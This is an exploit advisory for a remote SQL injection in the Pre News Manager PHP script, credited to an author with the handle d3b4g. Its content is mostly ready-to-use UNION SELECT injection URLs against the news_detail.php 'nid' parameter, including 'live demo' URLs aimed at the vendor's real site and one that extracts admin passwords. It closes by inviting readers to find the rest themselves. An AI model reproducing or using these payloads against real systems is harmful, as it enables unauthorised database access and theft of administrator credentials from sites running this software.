Pre News Manager[id]Remote SQL Injection Vulnerability
   --------------------------------------------------------------------------------


----------------------------------------------------------------
script : Pre News Manager

script  :  http://www.preprojects.com/pclphp.asp

Risk : High

----------------------------------------------------------------

Dicovered by : d3b4g

email : bl4ckend[at]gmail[dot]com

Site. www.bl4ck3nd.info

----------------------------------------------------------------
Exploit : http://www.target.com/[path]/news_detail.php?nid=-1+union+all+select+1,2,3,@@version,5,6,7/*

Live demo: http://www.preproject.com/news%20manager/news_detail.php?nid=-1+union+all+select+1,2,3,@@version,5,6,7/*

For password : http://www.preproject.com/news%20manager/news_detail.php?nid=-1+union+all+select+1,2,3,concat(password),5,6,7+from+admin/*

Rest find =P
 

----------------------------------------------------------------


----------------------------------------------------------------
Greetz: str0ke,,Hotlism.org,All my friends
          
-----------------------------------------------------------------
Proud to be a maldivian :))
=======================